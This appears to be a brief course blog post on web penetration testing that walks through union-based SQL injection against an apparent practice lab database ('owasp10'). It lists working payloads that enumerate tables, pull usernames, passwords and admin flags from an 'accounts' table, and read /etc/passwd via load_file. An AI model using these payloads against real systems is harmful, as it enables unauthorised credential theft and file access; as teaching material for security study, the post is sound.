Ethical Hacking - Web Penetration Testing(9)

SQL INJECTION

Discovering SQLi in GET

Inject by browser URL.

image

 

Selecting Data From Database

Change the number to a big one, then you can get a useful error message. And you can try different number to find the right column.

image

Using “union select 1,2,3,4,5” to find the right column.

image

Then replace it with the information we want to get. (database, user, version)

image

Finding Database Tables

union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'

image

Extracting Sensitive Data Such As Passwords.

union select 1,column_name,null,null,5 from information_schema.columns where table_name = 'accounts'

image

union select 1,username,password,is_admin,5 from accounts

 Reading Files

union select null,load_file('/etc/passwd'),null,null,null

 Writing Files

 

 

 

posted @ 2020-02-09 17:41  晨风_Eric  阅读(117)  评论(0编辑  收藏  举报